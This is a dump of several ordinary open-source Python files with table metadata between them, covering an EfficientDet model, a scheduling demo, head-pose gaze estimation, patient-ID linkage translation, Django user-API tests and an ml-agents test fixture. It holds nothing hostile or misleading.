                            for _ in range(num_layers)])
             for _ in range(5)])
        # Final conv predicts num_classes logits per anchor.
        self.header = SeparableConvBlock(in_channels, num_anchors * num_classes, norm=False, activation=False)
        self.swish = Swish() if onnx_export else MemoryEfficientSwish()

    def forward(self, inputs):
        """Return class probabilities of shape (batch, total_anchors, num_classes)."""
        feats = []
        for feat, bn_list in zip(inputs, self.bn_list):
            # Shared convs, level-specific norms; the original's
            # zip(range(num_layers), ...) index was unused and is dropped.
            for bn, conv in zip(bn_list, self.conv_list):
                feat = self.swish(bn(conv(feat)))
            feat = self.header(feat)
            # (B, C, H, W) -> (B, H, W, anchors, classes) -> (B, H*W*anchors, classes)
            feat = feat.permute(0, 2, 3, 1)
            feat = feat.contiguous().view(feat.shape[0], feat.shape[1], feat.shape[2], self.num_anchors, self.num_classes)
            feat = feat.contiguous().view(feat.shape[0], -1, self.num_classes)
            feats.append(feat)
        feats = torch.cat(feats, dim=1)
        # Sigmoid, not softmax: each class is predicted independently.
        feats = feats.sigmoid()
        return feats
class EfficientNet(nn.Module):
    """EfficientNet backbone stripped down to a feature extractor.

    The classification head (conv head, final BN, pooling, dropout, FC) is
    deleted; only the stem and the MBConv blocks remain.
    """

    def __init__(self, phi, load_weights=False):
        """
        Args:
            phi: EfficientNet scaling coefficient (selects efficientnet-b{phi}).
            load_weights: load pretrained weights via EffNet.from_pretrained.
        """
        super(EfficientNet, self).__init__()
        backbone = EffNet.from_pretrained(f'efficientnet-b{phi}', load_weights)
        # Remove everything after the last block — only feature maps are needed.
        del backbone._conv_head
        del backbone._bn1
        del backbone._avg_pooling
        del backbone._dropout
        del backbone._fc
        self.model = backbone

    def forward(self, x):
        """Return feature maps captured just before each resolution drop."""
        x = self.model._swish(self.model._bn0(self.model._conv_stem(x)))

        feature_maps = []
        previous = None
        total_blocks = len(self.model._blocks)
        for idx, block in enumerate(self.model._blocks):
            # Drop-connect rate scales linearly with block depth.
            rate = self.model._global_params.drop_connect_rate
            if rate:
                rate *= float(idx) / total_blocks
            x = block(x, drop_connect_rate=rate)
            if block._depthwise_conv.stride == [2, 2]:
                # Resolution is about to halve: the previous output is the
                # final map at the current scale.
                feature_maps.append(previous)
            elif idx == total_blocks - 1:
                feature_maps.append(x)
            previous = x
        del previous
        # Skip the first captured map (it is None / the pre-stride-1 entry).
        return feature_maps[1:]
class EfficientDetBackbone(nn.Module):
    """Complete EfficientDet-D{phi} model: backbone + BiFPN + heads + anchors."""

    def __init__(self, num_classes=80, phi=0, load_weights=False):
        """
        Args:
            num_classes: number of object classes for the classification head.
            phi: compound-scaling coefficient (0-7) selecting the model size.
            load_weights: load pretrained EfficientNet backbone weights.
        """
        super(EfficientDetBackbone, self).__init__()
        self.phi = phi
        # Per-phi compound-scaling tables (backbone size, BiFPN width/depth,
        # head depth, anchor base scale).
        self.backbone_phi = [0, 1, 2, 3, 4, 5, 6, 6]
        self.fpn_num_filters = [64, 88, 112, 160, 224, 288, 384, 384]
        self.fpn_cell_repeats = [3, 4, 5, 6, 7, 7, 8, 8]
        self.box_class_repeats = [3, 3, 3, 4, 4, 4, 5, 5]
        self.anchor_scale = [4., 4., 4., 4., 4., 4., 4., 5.]
        num_anchors = 9
        # Backbone output channels at (P3, P4, P5) for each phi.
        conv_channel_coef = {
            0: [40, 112, 320],
            1: [40, 112, 320],
            2: [48, 120, 352],
            3: [48, 136, 384],
            4: [56, 160, 448],
            5: [64, 176, 512],
            6: [72, 200, 576],
            7: [72, 200, 576],
        }
        # Only the first BiFPN cell sees raw backbone maps (first_time=True);
        # the largest models (phi >= 6) run without attention weighting.
        # (Replaced the redundant `True if X else False` ternaries.)
        self.bifpn = nn.Sequential(
            *[BiFPN(self.fpn_num_filters[self.phi],
                    conv_channel_coef[phi],
                    _ == 0,
                    attention=phi < 6)
              for _ in range(self.fpn_cell_repeats[phi])])
        self.num_classes = num_classes
        self.regressor = BoxNet(in_channels=self.fpn_num_filters[self.phi], num_anchors=num_anchors,
                                num_layers=self.box_class_repeats[self.phi])
        self.classifier = ClassNet(in_channels=self.fpn_num_filters[self.phi], num_anchors=num_anchors,
                                   num_classes=num_classes, num_layers=self.box_class_repeats[self.phi])
        self.anchors = Anchors(anchor_scale=self.anchor_scale[phi])
        self.backbone_net = EfficientNet(self.backbone_phi[phi], load_weights)

    def freeze_bn(self):
        """Put every BatchNorm2d into eval mode (freezes running statistics)."""
        for m in self.modules():
            if isinstance(m, nn.BatchNorm2d):
                m.eval()

    def forward(self, inputs):
        """Run detection; returns (features, regression, classification, anchors)."""
        # The backbone returns four maps; the first (finest) is discarded and
        # (P3, P4, P5) feed the BiFPN.
        _, p3, p4, p5 = self.backbone_net(inputs)
        features = (p3, p4, p5)
        features = self.bifpn(features)
        regression = self.regressor(features)
        classification = self.classifier(features)
        anchors = self.anchors(inputs)
        return features, regression, classification, anchors
| true | true |
f7fa213c05b4fe9d1bb10feae5e7f577d91079db | 130 | py | Python | src/domain/errors/unable_to_get_all_glaucomatous_images_paths_failure.py | OzielFilho/ProjetoFinalPdi | c9e6fe415f1a985d6eeac204580d3ab623026665 | [
"MIT"
] | null | null | null | src/domain/errors/unable_to_get_all_glaucomatous_images_paths_failure.py | OzielFilho/ProjetoFinalPdi | c9e6fe415f1a985d6eeac204580d3ab623026665 | [
"MIT"
] | null | null | null | src/domain/errors/unable_to_get_all_glaucomatous_images_paths_failure.py | OzielFilho/ProjetoFinalPdi | c9e6fe415f1a985d6eeac204580d3ab623026665 | [
"MIT"
] | null | null | null | from domain.errors.image_failure import ImageFailure
class UnableToGetAllGlaucomatousImagesPathsFailure(ImageFailure):
    """Failure used when the full list of glaucomatous image paths cannot be
    obtained. Carries no extra state; see ImageFailure for the shared
    failure contract.
    """
    pass
| 21.666667 | 65 | 0.861538 | from domain.errors.image_failure import ImageFailure
class UnableToGetAllGlaucomatousImagesPathsFailure(ImageFailure):
pass
| true | true |
f7fa21931bd82cc83a46973bb7ccd1c89a249317 | 795 | py | Python | test/simple-test.py | rafaeldelrey/pyschedule | 96ed5abc05fdad5d7e93393d627c5316e90102fe | [
"Apache-2.0"
] | null | null | null | test/simple-test.py | rafaeldelrey/pyschedule | 96ed5abc05fdad5d7e93393d627c5316e90102fe | [
"Apache-2.0"
] | null | null | null | test/simple-test.py | rafaeldelrey/pyschedule | 96ed5abc05fdad5d7e93393d627c5316e90102fe | [
"Apache-2.0"
] | null | null | null | from pyschedule import Scenario, solvers
# Demo: schedule three household chores between two people and print the plan.

# the planning horizon has 10 periods
S = Scenario('household',horizon=10)
# two resources: Alice and Bob
Alice, Bob = S.Resource('Alice'), S.Resource('Bob')
# three tasks: cook, wash, and clean
# (delay_cost penalizes late completion; cleaning is weighted double)
cook = S.Task('cook',length=1,delay_cost=1)
wash = S.Task('wash',length=2,delay_cost=1)
clean = S.Task('clean',length=3,delay_cost=2)
# every task can be done either by Alice or Bob
cook += Alice | Bob
wash += Alice | Bob
clean += Alice | Bob

# Alternative solver (CBC), kept for reference:
#print("\n##############################")
#print("Compute and print a schedule using CBC")
#solvers.mip.solve(S,kind='CBC', msg=True)
#print(S.solution())

# Solve the MIP with GLPK and print the resulting assignment/schedule.
print("\n##############################")
print("Compute and print a schedule using GLPK")
solvers.mip.solve(S,kind='GLPK', msg=True)
print(S.solution())
| 28.392857 | 51 | 0.65283 | from pyschedule import Scenario, solvers
S = Scenario('household',horizon=10)
Alice, Bob = S.Resource('Alice'), S.Resource('Bob')
cook = S.Task('cook',length=1,delay_cost=1)
wash = S.Task('wash',length=2,delay_cost=1)
clean = S.Task('clean',length=3,delay_cost=2)
cook += Alice | Bob
wash += Alice | Bob
clean += Alice | Bob
print("\n##############################")
print("Compute and print a schedule using GLPK")
solvers.mip.solve(S,kind='GLPK', msg=True)
print(S.solution())
| true | true |
f7fa229686aa6986aa8b8f8a1dc2ccded74af095 | 5,940 | py | Python | adam_visual_perception/head_gaze_estimator.py | isi-vista/adam-visual-perception | 8ad6ed883b184b5407a1bf793617b226c78b3a13 | [
"MIT"
] | 1 | 2020-07-21T10:52:26.000Z | 2020-07-21T10:52:26.000Z | adam_visual_perception/head_gaze_estimator.py | isi-vista/adam-visual-perception | 8ad6ed883b184b5407a1bf793617b226c78b3a13 | [
"MIT"
] | null | null | null | adam_visual_perception/head_gaze_estimator.py | isi-vista/adam-visual-perception | 8ad6ed883b184b5407a1bf793617b226c78b3a13 | [
"MIT"
] | 2 | 2020-07-21T15:30:42.000Z | 2021-01-20T21:54:09.000Z | from adam_visual_perception import LandmarkDetector
from adam_visual_perception.utility import *
import numpy as np
import math
import cv2
import os
import sys
class HeadGazeEstimator:
    """Estimate a per-frame gaze ray from facial landmarks via head pose.

    Six canonical 3D face-model points are matched against detected 2D
    landmarks with cv2.solvePnP; the head pose is visualised (and returned)
    as a ray projected out of the nose tip.
    """

    def __init__(self, write_video=False):
        """
        Parameters
        ----------
        write_video : bool, optional
            Write the resulting OpenCV video to a sibling "<parent>_pnp"
            directory.
        """
        # Generic 3D face model points (arbitrary units), in the same order
        # as the 2D points assembled in get_gaze_rays().
        self.model_points = np.array(
            [
                (0.0, 0.0, 0.0),  # Nose tip
                (0.0, -330.0, -65.0),  # Chin
                (-225.0, 170.0, -135.0),  # Left eye left corner
                (225.0, 170.0, -135.0),  # Right eye right corner
                (-150.0, -150.0, -125.0),  # Left mouth corner
                (150.0, -150.0, -125.0),  # Right mouth corner
            ]
        )
        self.dist_coeffs = np.zeros((4, 1))  # Assuming no lens distortion
        self.write_video = write_video
        self.landmark_detector = LandmarkDetector(write_video=False)

    def get_gaze_rays(self, filename, bbox_history=None, show=True):
        """Compute gaze rays for every frame of ``filename``.

        Parameters
        ----------
        filename : str
            Path to the input video.
        bbox_history : dict, optional
            Per-frame list of (x, y, w, h) boxes whose centres are drawn.
        show : bool, optional
            Display each annotated frame in an OpenCV window.

        Returns
        -------
        dict
            Maps frame index to ``(p1, p2)``: the nose-tip pixel and the
            projected end point of the gaze ray.
        """
        # Get the landmarks for the entire video
        landmark_map = self.landmark_detector.detect(filename, show=False)

        cap = cv2.VideoCapture(filename)
        frame_no = 0
        gaze_angles = {}
        writer = None

        # Loop over the frames from the video stream
        while True:
            success, frame = cap.read()
            if not success:
                if frame_no == 0:
                    print("Failed to read video")
                    sys.exit(1)
                else:
                    break

            if frame_no == 0:
                # Camera internals: approximate focal length by the frame
                # width and the principal point by the image centre.
                size = frame.shape
                focal_length = size[1]
                center = (size[1] / 2, size[0] / 2)
                camera_matrix = np.array(
                    [
                        [focal_length, 0, center[0]],
                        [0, focal_length, center[1]],
                        [0, 0, 1],
                    ],
                    dtype="double",
                )
                if self.write_video:
                    # Initialize our video writer
                    fourcc = cv2.VideoWriter_fourcc(*"mp4v")
                    par_path = os.path.abspath(os.path.join(filename, os.pardir))
                    dir_path = par_path + "_pnp"
                    if not os.path.isdir(dir_path):
                        os.makedirs(dir_path)
                    video_path = os.path.join(dir_path, os.path.basename(filename))
                    writer = cv2.VideoWriter(
                        video_path, fourcc, 30, (frame.shape[1], frame.shape[0]), True
                    )

            if frame_no in landmark_map:
                # 2D image points matching self.model_points. The indices
                # look like the dlib 68-landmark convention — TODO confirm
                # against LandmarkDetector's output.
                image_points = np.array(
                    [
                        landmark_map[frame_no][33],  # Nose tip
                        landmark_map[frame_no][8],  # Chin
                        landmark_map[frame_no][36],  # Left eye left corner
                        landmark_map[frame_no][45],  # Right eye right corner
                        landmark_map[frame_no][48],  # Left mouth corner
                        landmark_map[frame_no][54],  # Right mouth corner
                    ],
                    dtype="double",
                )

                # Solve for head pose, then project a point 1000 units in
                # front of the nose to draw a line sticking out of it.
                success, rotation_vector, translation_vector = cv2.solvePnP(
                    self.model_points,
                    image_points,
                    camera_matrix,
                    self.dist_coeffs,
                    flags=cv2.SOLVEPNP_ITERATIVE,
                )
                nose_end_point2D, _ = cv2.projectPoints(
                    np.array([(0.0, 0.0, 1000.0)]),
                    rotation_vector,
                    translation_vector,
                    camera_matrix,
                    self.dist_coeffs,
                )

                # Draw the six pose landmarks in blue, all others in red.
                # FIX: the previous `p in image_points` used NumPy's
                # element-wise __contains__ (any single matching coordinate),
                # not row membership; compare integer pixel pairs instead.
                pose_pixels = {(int(q[0]), int(q[1])) for q in image_points}
                for p in image_points:
                    cv2.circle(frame, (int(p[0]), int(p[1])), 1, (255, 0, 0), -1)
                for p in landmark_map[frame_no]:
                    if (int(p[0]), int(p[1])) in pose_pixels:
                        continue
                    cv2.circle(frame, (int(p[0]), int(p[1])), 1, (0, 0, 255), -1)

                p1 = (int(image_points[0][0]), int(image_points[0][1]))
                p2 = (int(nose_end_point2D[0][0][0]), int(nose_end_point2D[0][0][1]))

                # Extend the nose->projection segment to 3x its length.
                # Guard against a zero-length segment (previously a
                # ZeroDivisionError when p1 == p2).
                lenAB = math.sqrt((p1[0] - p2[0]) ** 2 + (p1[1] - p2[1]) ** 2)
                if lenAB > 0:
                    length = lenAB * 3
                    C_x = int(p2[0] + (p2[0] - p1[0]) / lenAB * length)
                    C_y = int(p2[1] + (p2[1] - p1[1]) / lenAB * length)
                    cv2.line(frame, p1, (C_x, C_y), (0, 255, 0), 2)

                if bbox_history is not None and (self.write_video or show):
                    # Mark the centre of each tracked bounding box.
                    bboxes = bbox_history[frame_no]
                    for bbox in bboxes:
                        x, y = int(bbox[0]), int(bbox[1])
                        w, h = int(bbox[2]), int(bbox[3])
                        cv2.circle(
                            frame, (int(x + w / 2), int(y + h / 2)), 5, (0, 0, 255), -1
                        )

                # Store in the return dictionary
                gaze_angles[frame_no] = (p1, p2)

            # Show the frame if the flag is on
            if show:
                cv2.imshow("Frame", frame)
                cv2.waitKey(1)

            # Write the video if the flag is on
            if self.write_video:
                writer.write(frame)
            frame_no += 1

        # Cleanup: release the capture handle (previously leaked) and writer.
        cap.release()
        cv2.destroyAllWindows()
        if self.write_video:
            writer.release()
        return gaze_angles
| 35.783133 | 87 | 0.458754 | from adam_visual_perception import LandmarkDetector
from adam_visual_perception.utility import *
import numpy as np
import math
import cv2
import os
import sys
class HeadGazeEstimator:
def __init__(self, write_video=False):
self.model_points = np.array(
[
(0.0, 0.0, 0.0),
(0.0, -330.0, -65.0),
(-225.0, 170.0, -135.0),
(225.0, 170.0, -135.0),
(-150.0, -150.0, -125.0),
(150.0, -150.0, -125.0),
]
)
self.dist_coeffs = np.zeros((4, 1))
self.write_video = write_video
self.landmark_detector = LandmarkDetector(write_video=False)
def get_gaze_rays(self, filename, bbox_history=None, show=True):
landmark_map = self.landmark_detector.detect(filename, show=False)
cap = cv2.VideoCapture(filename)
frame_no = 0
gaze_angles = {}
while True:
success, frame = cap.read()
if not success:
if frame_no == 0:
print("Failed to read video")
sys.exit(1)
else:
break
if frame_no == 0:
size = frame.shape
focal_length = size[1]
center = (size[1] / 2, size[0] / 2)
camera_matrix = np.array(
[
[focal_length, 0, center[0]],
[0, focal_length, center[1]],
[0, 0, 1],
],
dtype="double",
)
if self.write_video:
fourcc = cv2.VideoWriter_fourcc(*"mp4v")
par_path = os.path.abspath(os.path.join(filename, os.pardir))
dir_path = par_path + "_pnp"
if not os.path.isdir(dir_path):
os.makedirs(dir_path)
video_path = os.path.join(dir_path, os.path.basename(filename))
writer = cv2.VideoWriter(
video_path, fourcc, 30, (frame.shape[1], frame.shape[0]), True
)
if frame_no in landmark_map:
image_points = np.array(
[
landmark_map[frame_no][33],
landmark_map[frame_no][8],
landmark_map[frame_no][36],
landmark_map[frame_no][45],
landmark_map[frame_no][48],
landmark_map[frame_no][54],
],
dtype="double",
)
success, rotation_vector, translation_vector = cv2.solvePnP(
self.model_points,
image_points,
camera_matrix,
self.dist_coeffs,
flags=cv2.SOLVEPNP_ITERATIVE,
)
nose_end_point2D, jacobian = cv2.projectPoints(
np.array([(0.0, 0.0, 1000.0)]),
rotation_vector,
translation_vector,
camera_matrix,
self.dist_coeffs,
)
for p in image_points:
cv2.circle(frame, (int(p[0]), int(p[1])), 1, (255, 0, 0), -1)
for p in landmark_map[frame_no]:
if p in image_points:
continue
cv2.circle(frame, (int(p[0]), int(p[1])), 1, (0, 0, 255), -1)
p1 = (int(image_points[0][0]), int(image_points[0][1]))
p2 = (int(nose_end_point2D[0][0][0]), int(nose_end_point2D[0][0][1]))
lenAB = math.sqrt((p1[0] - p2[0]) ** 2 + (p1[1] - p2[1]) ** 2)
length = lenAB * 3
C_x = int(p2[0] + (p2[0] - p1[0]) / lenAB * length)
C_y = int(p2[1] + (p2[1] - p1[1]) / lenAB * length)
cv2.line(frame, p1, (C_x, C_y), (0, 255, 0), 2)
if bbox_history is not None and (self.write_video or show):
bboxes = bbox_history[frame_no]
for i, bbox in enumerate(bboxes):
x, y = int(bbox[0]), int(bbox[1])
w, h = int(bbox[2]), int(bbox[3])
cv2.circle(
frame, (int(x + w / 2), int(y + h / 2)), 5, (0, 0, 255), -1
)
gaze_angles[frame_no] = (p1, p2)
if show:
cv2.imshow("Frame", frame)
key = cv2.waitKey(1) & 0xFF
if self.write_video:
writer.write(frame)
frame_no += 1
cv2.destroyAllWindows()
if self.write_video:
writer.release()
return gaze_angles
| true | true |
f7fa2299372fe17048452363068cff5c46f44949 | 1,515 | py | Python | tuning-files-scripts/patid_translate.py | NACHC-CAD/linkage-agent-tools | 324299e534bc55bd652eb670feb195ce5646f13e | [
"Apache-2.0"
] | null | null | null | tuning-files-scripts/patid_translate.py | NACHC-CAD/linkage-agent-tools | 324299e534bc55bd652eb670feb195ce5646f13e | [
"Apache-2.0"
] | 1 | 2021-10-01T15:13:15.000Z | 2021-10-01T15:13:15.000Z | tuning-files-scripts/patid_translate.py | NACHC-CAD/linkage-agent-tools | 324299e534bc55bd652eb670feb195ce5646f13e | [
"Apache-2.0"
] | null | null | null | import argparse
import csv
from pathlib import Path
from dcctools.config import Configuration

# Translate the anonymous linkage table (link_ids.csv, whose per-system cells
# are row numbers into that system's PII extract) into a table of real PATIDs
# so the linkage can be scored.

parser = argparse.ArgumentParser(
    description="Tool for translating linkage table to patid table for scoring"
)
parser.add_argument(
    "--dotools", nargs=1, required=True, help="data-owner-tools project path"
)
args = parser.parse_args()
data_owner_tools_path = Path(args.dotools[0])

c = Configuration("config.json")
systems = c.systems

# Output header: LINK_ID followed by one PATID column per system.
header = ["LINK_ID"]
header.extend(systems)

# Load each system's PII extract (minus the header row) so the row numbers
# stored in link_ids.csv can be resolved to PATIDs (first column of each row).
pii_line_map = {}
for s in systems:
    pii_csv_path = Path(data_owner_tools_path) / "temp-data/pii_{}.csv".format(s)
    with open(pii_csv_path) as pii_csv:
        pii_reader = csv.reader(pii_csv)
        next(pii_reader)  # skip the header row
        pii_line_map[s] = list(pii_reader)

result_csv_path = Path(c.matching_results_folder) / "link_ids.csv"
patid_csv_path = Path(c.matching_results_folder) / "patid_link_ids.csv"
with open(result_csv_path) as csvfile:
    link_id_reader = csv.DictReader(csvfile)
    with open(patid_csv_path, "w", newline="", encoding="utf-8") as patid_file:
        writer = csv.DictWriter(patid_file, fieldnames=header)
        writer.writeheader()
        for link in link_id_reader:
            row = {"LINK_ID": link["LINK_ID"]}
            for s in systems:
                # An empty cell means this system has no record for the link;
                # its PATID column is left blank.
                if len(link[s]) > 0:
                    pii_line = link[s]
                    # NOTE(review): assumes the stored index lines up with
                    # the post-header row list built above — confirm there is
                    # no off-by-one versus how link_ids.csv was generated.
                    patid = pii_line_map[s][int(pii_line)][0]
                    row[s] = patid
            writer.writerow(row)
print("results/patid_link_ids.csv created")
| 30.918367 | 81 | 0.673267 | import argparse
import csv
from pathlib import Path
from dcctools.config import Configuration
parser = argparse.ArgumentParser(
description="Tool for translating linkage table to patid table for scoring"
)
parser.add_argument(
"--dotools", nargs=1, required=True, help="data-owner-tools project path"
)
args = parser.parse_args()
data_owner_tools_path = Path(args.dotools[0])
c = Configuration("config.json")
systems = c.systems
header = ["LINK_ID"]
header.extend(systems)
pii_line_map = {}
for s in systems:
pii_csv_path = Path(data_owner_tools_path) / "temp-data/pii_{}.csv".format(s)
with open(pii_csv_path) as pii_csv:
pii_reader = csv.reader(pii_csv)
next(pii_reader)
pii_line_map[s] = list(pii_reader)
result_csv_path = Path(c.matching_results_folder) / "link_ids.csv"
patid_csv_path = Path(c.matching_results_folder) / "patid_link_ids.csv"
with open(result_csv_path) as csvfile:
link_id_reader = csv.DictReader(csvfile)
with open(patid_csv_path, "w", newline="", encoding="utf-8") as patid_file:
writer = csv.DictWriter(patid_file, fieldnames=header)
writer.writeheader()
for link in link_id_reader:
row = {"LINK_ID": link["LINK_ID"]}
for s in systems:
if len(link[s]) > 0:
pii_line = link[s]
patid = pii_line_map[s][int(pii_line)][0]
row[s] = patid
writer.writerow(row)
print("results/patid_link_ids.csv created")
| true | true |
f7fa22f365b75ce1372129858b1e1ffd535cb665 | 4,828 | py | Python | app/user/tests/test_user_api.py | sunnyrpandya/recipe-app-api | 92fbefb9bd80e967cd1111ddc25c3c8da5980c39 | [
"MIT"
] | null | null | null | app/user/tests/test_user_api.py | sunnyrpandya/recipe-app-api | 92fbefb9bd80e967cd1111ddc25c3c8da5980c39 | [
"MIT"
] | null | null | null | app/user/tests/test_user_api.py | sunnyrpandya/recipe-app-api | 92fbefb9bd80e967cd1111ddc25c3c8da5980c39 | [
"MIT"
] | null | null | null | from django.test import TestCase
from django.contrib.auth import get_user_model
from django.urls import reverse
from rest_framework.test import APIClient
from rest_framework import status
# Endpoints under test, resolved once at import time.
CREATE_USER_URL = reverse('user:create')
TOKEN_URL = reverse('user:token')
ME_URL = reverse('user:me')
def create_user(**params):
    """Test helper: create and return a user via the active user model."""
    return get_user_model().objects.create_user(**params)
class PublicUsersAPITest(TestCase):
    """Test the users API endpoints that require no authentication"""

    def setUp(self):
        self.client = APIClient()

    def test_create_valid_user_success(self):
        """Test creating user with valid payload is successful"""
        payload = {
            'email': 'test@example.com',
            'password': 'test123',
            'name': 'Test Name'
        }

        res = self.client.post(CREATE_USER_URL, payload)

        self.assertEqual(res.status_code, status.HTTP_201_CREATED)
        # The created user must exist and carry the submitted password...
        user = get_user_model().objects.get(**res.data)
        self.assertTrue(user.check_password(payload['password']))
        # ...but the password must never be echoed back in the response.
        self.assertNotIn('password', res.data)

    def test_user_exists(self):
        """Test creating a user that already exists fails"""
        payload = {'email': 'test2@example.com', 'password': 'testpass'}
        create_user(**payload)

        res = self.client.post(CREATE_USER_URL, payload)

        self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)

    def test_password_too_short(self):
        """Test that a too-short password (here 4 characters) is rejected"""
        payload = {'email': 'badpass@example.com', 'password': 'pass'}

        res = self.client.post(CREATE_USER_URL, payload)

        self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
        # The invalid request must not have created the user.
        user_exists = get_user_model().objects.filter(
            email=payload['email']
        ).exists()
        self.assertFalse(user_exists)

    def test_create_token_for_user(self):
        """Test that a token is created for the user"""
        payload = {'email': 'something@domain.com', 'password': 'secret'}
        create_user(**payload)

        res = self.client.post(TOKEN_URL, payload)

        self.assertIn('token', res.data)
        self.assertEqual(res.status_code, status.HTTP_200_OK)

    def test_create_token_invalid_credentials(self):
        """Test that the token is not created if invalid credentials given"""
        create_user(email='test@example.com', password='testpass')
        # Same email, wrong password.
        payload = {'email': 'test@example.com', 'password': 'NOPE'}

        res = self.client.post(TOKEN_URL, payload)

        self.assertNotIn('token', res.data)
        self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)

    def test_create_token_no_user(self):
        """Test token not created if user doesn't exist"""
        payload = {'email': 'test@example.com', 'password': 'NOPE'}

        res = self.client.post(TOKEN_URL, payload)

        self.assertNotIn('token', res.data)
        self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)

    def test_create_token_missing_field(self):
        """Test that email and password are required"""
        res = self.client.post(TOKEN_URL, {'email': 'yep', 'password': ''})

        self.assertNotIn('token', res.data)
        self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)

    def test_retrieve_user_unauthorized(self):
        """Test that authentication is required for the /me endpoint"""
        res = self.client.get(ME_URL)

        self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateUserApiTests(TestCase):
    """Tests for user-API endpoints that require an authenticated user."""

    def setUp(self):
        # Create a user and force-authenticate the test client as that user.
        self.user = create_user(
            email='test@londonappdev.com',
            password='testpass',
            name='name'
        )
        self.client = APIClient()
        self.client.force_authenticate(user=self.user)

    def test_retrieve_profile_success(self):
        """An authenticated GET on /me returns the user's own profile."""
        response = self.client.get(ME_URL)

        self.assertEqual(response.status_code, status.HTTP_200_OK)
        expected = {
            'name': self.user.name,
            'email': self.user.email
        }
        self.assertEqual(response.data, expected)

    def test_post_me_not_allowed(self):
        """POST is rejected on the /me endpoint."""
        response = self.client.post(ME_URL, {})

        self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)

    def test_update_user_profile(self):
        """PATCH on /me updates name and password for the logged-in user."""
        changes = {'name': 'new name', 'password': 'newpassword'}

        response = self.client.patch(ME_URL, changes)

        self.user.refresh_from_db()
        self.assertEqual(self.user.name, changes['name'])
        self.assertTrue(self.user.check_password(changes['password']))
        self.assertEqual(response.status_code, status.HTTP_200_OK)
| 35.5 | 77 | 0.660936 | from django.test import TestCase
from django.contrib.auth import get_user_model
from django.urls import reverse
from rest_framework.test import APIClient
from rest_framework import status
CREATE_USER_URL = reverse('user:create')
TOKEN_URL = reverse('user:token')
ME_URL = reverse('user:me')
def create_user(**params):
return get_user_model().objects.create_user(**params)
class PublicUsersAPITest(TestCase):
def setUp(self):
self.client = APIClient()
def test_create_valid_user_success(self):
payload = {
'email': 'test@example.com',
'password': 'test123',
'name': 'Test Name'
}
res = self.client.post(CREATE_USER_URL, payload)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
user = get_user_model().objects.get(**res.data)
self.assertTrue(user.check_password(payload['password']))
self.assertNotIn('password', res.data)
def test_user_exists(self):
payload = {'email': 'test2@example.com', 'password': 'testpass'}
create_user(**payload)
res = self.client.post(CREATE_USER_URL, payload)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_password_too_short(self):
payload = {'email': 'badpass@example.com', 'password': 'pass'}
res = self.client.post(CREATE_USER_URL, payload)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
user_exists = get_user_model().objects.filter(
email=payload['email']
).exists()
self.assertFalse(user_exists)
def test_create_token_for_user(self):
payload = {'email': 'something@domain.com', 'password': 'secret'}
create_user(**payload)
res = self.client.post(TOKEN_URL, payload)
self.assertIn('token', res.data)
self.assertEqual(res.status_code, status.HTTP_200_OK)
def test_create_token_invalid_credentials(self):
create_user(email='test@example.com', password='testpass')
payload = {'email': 'test@example.com', 'password': 'NOPE'}
res = self.client.post(TOKEN_URL, payload)
self.assertNotIn('token', res.data)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_create_token_no_user(self):
payload = {'email': 'test@example.com', 'password': 'NOPE'}
res = self.client.post(TOKEN_URL, payload)
self.assertNotIn('token', res.data)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_create_token_missing_field(self):
res = self.client.post(TOKEN_URL, {'email': 'yep', 'password': ''})
self.assertNotIn('token', res.data)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_retrieve_user_unauthorized(self):
res = self.client.get(ME_URL)
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateUserApiTests(TestCase):
def setUp(self):
self.user = create_user(
email='test@londonappdev.com',
password='testpass',
name='name'
)
self.client = APIClient()
self.client.force_authenticate(user=self.user)
def test_retrieve_profile_success(self):
res = self.client.get(ME_URL)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data, {
'name': self.user.name,
'email': self.user.email
})
def test_post_me_not_allowed(self):
res = self.client.post(ME_URL, {})
self.assertEqual(res.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_update_user_profile(self):
payload = {'name': 'new name', 'password': 'newpassword'}
res = self.client.patch(ME_URL, payload)
self.user.refresh_from_db()
self.assertEqual(self.user.name, payload['name'])
self.assertTrue(self.user.check_password(payload['password']))
self.assertEqual(res.status_code, status.HTTP_200_OK)
| true | true |
f7fa23b09eb9b83fe4fd070c213a3a143a346fa0 | 7,639 | py | Python | ml-agents/mlagents/trainers/tests/test_ghost.py | bobcy2015/ml-agents | 5d02292ad889f1884fa98bd92f127f17cbfe0112 | [
"Apache-2.0"
] | 1 | 2021-02-09T09:42:13.000Z | 2021-02-09T09:42:13.000Z | ml-agents/mlagents/trainers/tests/test_ghost.py | bobcy2015/ml-agents | 5d02292ad889f1884fa98bd92f127f17cbfe0112 | [
"Apache-2.0"
] | 5 | 2020-09-26T01:23:05.000Z | 2022-02-10T01:58:20.000Z | ml-agents/mlagents/trainers/tests/test_ghost.py | bobcy2015/ml-agents | 5d02292ad889f1884fa98bd92f127f17cbfe0112 | [
"Apache-2.0"
] | 1 | 2021-10-01T06:54:08.000Z | 2021-10-01T06:54:08.000Z | import pytest
import numpy as np
from mlagents.trainers.ghost.trainer import GhostTrainer
from mlagents.trainers.ghost.controller import GhostController
from mlagents.trainers.behavior_id_utils import BehaviorIdentifiers
from mlagents.trainers.ppo.trainer import PPOTrainer
from mlagents.trainers.brain import BrainParameters
from mlagents.trainers.agent_processor import AgentManagerQueue
from mlagents.trainers.tests import mock_brain as mb
from mlagents.trainers.tests.test_trajectory import make_fake_trajectory
from mlagents.trainers.settings import TrainerSettings, SelfPlaySettings
@pytest.fixture
def dummy_config():
    """Trainer settings with self-play enabled, as used by the ghost-trainer tests."""
    settings = TrainerSettings(self_play=SelfPlaySettings())
    return settings
